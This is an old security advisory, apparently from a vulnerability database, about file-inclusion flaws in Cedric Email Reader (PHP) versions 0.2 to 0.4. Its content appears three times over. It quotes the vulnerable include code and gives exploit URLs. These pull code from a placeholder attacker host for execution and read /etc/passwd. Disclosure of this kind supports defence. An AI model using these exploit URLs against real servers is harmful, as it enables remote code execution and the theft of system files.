Cedric Email Reader (PHP)

2003-02-1100:00:00

vulners.com

149

JSON

Version : 0.2;0.3;0.4
Website : http://www.isoca.com/
Problems :Include file (local, remote)

Version: 0.2;0.3

File:

email.php3 (version 0.2) ; email.php (version 0.3)

PHP Code:

[…]
require('emailreader.ini');
if ($login > "") {
parse_str($param);
include($cer_skin);
include('email.inc');
$mbox = openimap($server, $username, $password);
$text = htmlspecialchars(get_part($mbox,$msgid, "TEXT/PLAIN"));
[…]

Exploit :

http://[target]/email.php?login=attacker&cer_skin=http://
[attacker]/code.php
–>
include http://[attacker]/code.php on remote server

include local file
–>
http://[target]/email.php?login=attacker&cer_skin=/etc/passwd

Versions: 0.4

File:

webmail/lib/emailreader_execute_on_each_page.inc.php

PHP Code:

[…]
$param = imap_base64($login);
parse_str($param);

@include($emailreader_ini);
@include('lib/'.$server_type.'.inc.php');
@include('skin/emailreaderskin_'.$lang.'.php');
[…]

Exploit :

http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?
emailreader_ini=http://[attacker]/code.php
–>
include http://[attacker]/code.php on remote server

include local file
–>
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?
emailreader_ini=/etc/passwd

–
(if registers_global=ON)

–
[email protected]

JSON

Cedric Email Reader &#40;PHP&#41;

File:

email.php3 (version 0.2) ; email.php (version 0.3)

PHP Code:

[…] require('emailreader.ini'); if ($login > "") { parse_str($param); include($cer_skin); include('email.inc'); $mbox = openimap($server, $username, $password); $text = htmlspecialchars(get_part($mbox,$msgid, "TEXT/PLAIN")); […]

Exploit :

http://[target]/email.php?login=attacker&cer_skin=http:// [attacker]/code.php –> include http://[attacker]/code.php on remote server

include local file –> http://[target]/email.php?login=attacker&cer_skin=/etc/passwd

File:

webmail/lib/emailreader_execute_on_each_page.inc.php

PHP Code:

@include($emailreader_ini); @include('lib/'.$server_type.'.inc.php'); @include('skin/emailreaderskin_'.$lang.'.php'); […]

Exploit :

http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php? emailreader_ini=http://[attacker]/code.php –> include http://[attacker]/code.php on remote server

include local file –> http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php? emailreader_ini=/etc/passwd

– (if registers_global=ON)

Cedric Email Reader (PHP)

[…]
require('emailreader.ini');
if ($login > "") {
parse_str($param);
include($cer_skin);
include('email.inc');
$mbox = openimap($server, $username, $password);
$text = htmlspecialchars(get_part($mbox,$msgid, "TEXT/PLAIN"));
[…]

http://[target]/email.php?login=attacker&cer_skin=http://
[attacker]/code.php
–>
include http://[attacker]/code.php on remote server

include local file
–>
http://[target]/email.php?login=attacker&cer_skin=/etc/passwd

@include($emailreader_ini);
@include('lib/'.$server_type.'.inc.php');
@include('skin/emailreaderskin_'.$lang.'.php');
[…]

http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?
emailreader_ini=http://[attacker]/code.php
–>
include http://[attacker]/code.php on remote server

include local file
–>
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?
emailreader_ini=/etc/passwd

–
(if registers_global=ON)